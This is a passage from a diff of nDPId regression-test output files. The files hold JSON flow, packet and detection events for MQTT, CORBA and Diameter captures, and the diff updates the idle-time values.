00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1926,"flow_first_seen":1455907258332,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53523,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1919,"flow_first_seen":1455907271483,"flow_last_seen":1455907286855,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61604,"flow_avg_l4_payload_len":32,"midstream":1,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.101","dst_ip":"192.168.56.1","src_port":17501,"dst_port":53524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1928,"flow_first_seen":1455907267002,"flow_last_seen":1455907286845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":61855,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1455907286855,"l3_proto":"ip4","src_ip":"192.168.56.1","dst_ip":"192.168.56.101","src_port":53528,"dst_port":17501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"MQTT","breed":"Acceptable","category":"RPC"}}
00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":8516,"source":"coap_mqtt.pcap","alias":"nDPId-test","packets-captured":8516,"packets-processed":8514,"total-skipped-flows":0,"total-l4-data-len":294179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":16,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":91,"global_ts_msec":1455907286855}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 8516/8514

36
test/results/corba.pcap.out
View File

@@ -1,23 +1,23 @@
00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"corba.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"corba.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1614768020788}
00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"}
00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"}
00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020789,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020789,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"}
00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"}
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"}
00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}}
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":22,"total-skipped-flows":0,"total-l4-data-len":2397,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1614768020795}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 25/22

12
test/results/diameter.pcap.out
View File

@@ -1,11 +1,11 @@
00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"diameter.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1263278878271}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"thread_ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
